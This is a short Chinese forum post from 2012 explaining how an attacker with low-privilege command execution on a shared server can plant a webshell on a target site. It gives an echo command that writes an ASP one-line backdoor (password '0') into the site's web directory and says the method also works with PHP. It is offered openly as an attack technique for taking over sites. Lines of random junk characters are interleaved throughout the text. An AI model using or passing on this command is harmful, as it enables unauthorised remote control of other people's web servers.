在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。
6 M& j; r. h) q2 ]) h0 x' B7 h+ e# g3 m3 s
命令格式1 m) @ H" D# a+ @5 {2 Y1 S
7 J; k7 `# w- g, l6 M2 g3 o! g& dEcho 语句 >目标站绝对目录1 o8 p% a" J) R& b
6 d& | l# t5 O( }
例如:
1 B. F) i6 P3 Q: Y5 x2 r
/ h3 E' y. v" p8 o6 n; Q# {echo ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp ~+ @) a/ d: [6 l: k
/ E$ i3 @% Q& C这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。
) l: r, Q3 U$ ~9 u$ Y X* a2 q |
发表于 2012-9-23 14:40:24
收藏
支持
反对